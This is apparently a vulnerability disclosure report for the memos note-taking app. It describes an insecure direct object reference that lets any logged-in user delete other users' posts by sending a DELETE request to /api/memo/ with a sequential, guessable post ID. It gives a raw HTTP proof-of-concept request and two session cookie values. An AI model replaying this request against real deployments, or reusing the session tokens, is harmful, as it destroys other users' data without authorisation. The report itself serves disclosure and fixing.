Description

As the title, an attacker can delete other user's post via post id (can be bruteforce)

Here is video poc: https://drive.google.com/file/d/18QucWYwkpO9kVPMqNzSQ-ptwrZGk-UP9/view?usp=share_link

Proof of Concept

DELETE /api/memo/$1026$ HTTP/2
Host: demo.usememos.com
Cookie: memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.usememos.com/
Origin: https://demo.usememos.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

The id 1026 is the post ID, when user create a post, the id increase 1 unit, so attacker can be delete other user's post via this id and request DELETE

Here is the session id with each account:

attacker session id memos_session=MTY3MjAyMzkzNnxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUk9fMqNUegFqgfGemADcwgQYFDYFrRl2lsWdeCjjKUx_uEW

User demo session id: memos_session=MTY3MjAyMzI4MXxEdi1GQkFFQ180WUFBUkFCRUFBQUhfLUdBQUVHYzNSeWFXNW5EQWtBQjNWelpYSXRhV1FEYVc1MEJBTUFfOUE9fP5tDVSp1CxdxPlf5c_7FWcF5Yb5SFR7POch2HJbm_WD

Impact

This vulnerability impact all of the user